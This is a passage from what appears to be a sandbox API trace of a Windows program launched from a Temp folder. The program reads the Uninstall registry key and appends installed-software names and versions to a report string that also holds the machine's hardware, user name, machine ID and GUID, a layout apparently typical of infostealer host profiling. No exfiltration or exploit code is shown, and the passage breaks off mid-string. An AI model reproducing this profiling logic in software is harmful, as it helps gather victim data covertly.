lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\n" [0175.913] RegCloseKey (hKey=0x354) returned 0x0 [0175.913] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x23, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-001B-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.913] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-001B-0409-0000-0000000FF1CE}") returned 90 [0175.913] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-001B-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.913] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Word MUI (English) 2016", lpcbData=0x197fd4*=0x22) returned 0x0 [0175.913] lstrlenA (lpString="Microsoft Word MUI (English) 2016") returned 33 [0175.913] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft Word MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016" [0175.913] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.914] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 " [0175.914] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001" [0175.914] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 